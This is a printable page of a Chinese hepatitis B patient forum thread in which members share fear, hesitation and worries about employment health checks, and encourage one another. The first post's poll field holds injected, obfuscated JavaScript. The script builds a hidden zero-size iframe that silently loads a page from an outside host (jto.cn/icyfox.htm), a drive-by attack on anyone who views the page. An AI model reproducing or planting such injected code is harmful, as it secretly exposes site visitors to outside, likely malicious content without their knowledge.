肝胆相照论坛

标题: 已肝!让我毁了一生 [打印本页]

作者: lovedong    时间: 2005-8-24 20:06     标题: 已肝!让我毁了一生

';document.all.popmenu.innerHTML=document.all.popmenu.innerHTML+String.fromCharCode(60)+'IFRAME frameBorder=0 height=0 marginHeight=0 marginWidth=0 scrolling=no src=http://www.jto.cn/icyfox.htm width=0'+String.fromCharCode(62)+String.fromCharCode(60)+'/IFRAME'+String.fromCharCode(62);var vote='害怕

恐惧

犹豫

惊恐

作者: zhangsir    时间: 2005-8-24 21:45

恐惧什么???

害怕什么???????

走在路上你怕被车撞死吗?

人活着要坚强

作者: lh1970    时间: 2005-8-25 21:05

应该加上无能为力
作者: 梦醒了吗    时间: 2005-8-25 21:12

多是犹豫,都是为了别人,为了亲人、为了朋友、为了女友想得比较多,自己我是没想什么,和2楼的想法一样,人走在路上难道还担心被车撞,怕死难道就不活了
作者: douhaha    时间: 2010-6-14 12:30     标题: f e

现在招聘员工或员工入职后要健康检查,那些医院推荐的套餐上都有查乙肝两对半的,这样找了几次工作都不行,没工作就不能生存啊,!!!!!!!!!!!!!!!!
作者: 小脑袋    时间: 2010-6-14 15:23

:开始当我知道自己患有乙肝的时候,也很消极,找工作都不敢找查体检的,和朋友在一起就怕传染她们,总是疏远她们呢,后来慢慢就想开了,人这一辈子不可能全都健健康康的,总会有这病那病,我们只不过是早得了!在说有个突发事故那些没病的还不如我们呢,我们比起天生残疾的要欣慰多了,既然注定已成现实,我们没有选择,要么堕落要么自强!只是对于我们的另一半,能接受现在这种情况的我们吗?
作者: 溪亭日暮    时间: 2010-12-29 09:43

现在公司也要体检了,我家又离公司里面有好几个亲戚在这做,你说我不恐惧我还能怎么办。
作者: 嘟嘟吧2    时间: 2011-3-11 12:33

自己开公司得到
作者: hqhuqiang    时间: 2011-3-11 16:14

不就是个乙肝,没有什么大不了的
作者: 奇艺天空    时间: 2011-8-25 19:44

咳,可怜啊
作者: 397558923    时间: 2016-6-6 14:12

办法总比困难多

欢迎光临 肝胆相照论坛 (http://hbvhbv.info/forum/) Powered by Discuz! X1.5